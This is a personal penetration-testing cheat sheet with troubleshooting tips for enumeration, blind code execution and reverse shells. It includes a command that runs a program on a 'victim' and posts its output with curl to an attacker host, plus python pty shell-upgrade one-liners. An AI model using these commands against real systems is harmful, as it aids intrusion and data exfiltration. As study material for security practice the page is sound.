akde/infosec

Information security is ultimately about managing risk


Enumeration

  • You can read arbitrary files.
    • Can you upload as well somehow?
      • Via another port maybe?
    • Determine interesting files for the given technique
    • Perform blind enumeration for the OS
  • You have a port, but no clue what it does.
    • Start Wireshark first
    • Check the port number in the web.
    • Try a default HTTP request.
    • Add a very large input.
    • Scan with -sA ACK scan to circumvent a possible firewall.
  • You have a password:
  • You have an image file

Code execution

  • You have a blind code execution which doesn't always work?
    • Try to determine if there are some bad characters.
  • You don't get a reverse shell.
    • Try another port. Use a port which is open for inbound traffic.
    • Are you using the correct architecture?
  • You executed something on a server, which didn't work, but you don't know why?
    • Try to redirect STDERR and STDOUT.
    • Try to redirect it and also print it to a local nc listener like this (the bash-only &> is written as > file 2>&1 here so it also works under /bin/sh, where &> would background the command instead):
      ./wontworkonavictim > /tmp/output 2>&1; curl --data @/tmp/output http://$ownip:5555/
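The redirection step above, as an added example that is not part of the original checklist: a small POSIX sh helper that records stdout, stderr and the exit status of a command in one file so a blind execution can be diagnosed. The function name capture_run and the output file are assumptions; it only writes the file locally and does not post it anywhere.

```shell
#!/bin/sh
# Added example (not from the original page). Collects everything a failed
# command produced: stdout, stderr and its exit status, appended to one file.
# Note: `cmd &> file` is a bash extension; under /bin/sh (dash) it parses as
# `cmd &` followed by `> file`, backgrounding cmd and truncating the file.
# `> file 2>&1` below is the portable spelling.

# capture_run OUTFILE CMD [ARGS...]
#   Runs CMD, captures both streams into OUTFILE, appends the exit status
#   and returns that same status to the caller. (hypothetical helper name)
capture_run() {
    out="$1"
    shift
    # stdout and stderr both go to the file, stderr via the duplicated fd
    "$@" > "$out" 2>&1
    status=$?
    printf '\n[exit status: %s]\n' "$status" >> "$out"
    return "$status"
}
```

Read the file afterwards with cat (or ship it with curl as in the checklist) to see the error message the blind execution swallowed.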

I am stuck

  • HTTP
    • Tried to search within directories with gobuster and/or with file suffixes?
    • Other wordlists?

About

Personal collection of some infosec stuff. Primary purpose of this site is to collect and organize for myself.

Note: Some content is not publicly visible due to copyright issues. Therefore, some links could be broken.

python -c 'import pty;pty.spawn("/bin/bash")';

python3 -c 'import pty;pty.spawn("/bin/bash")';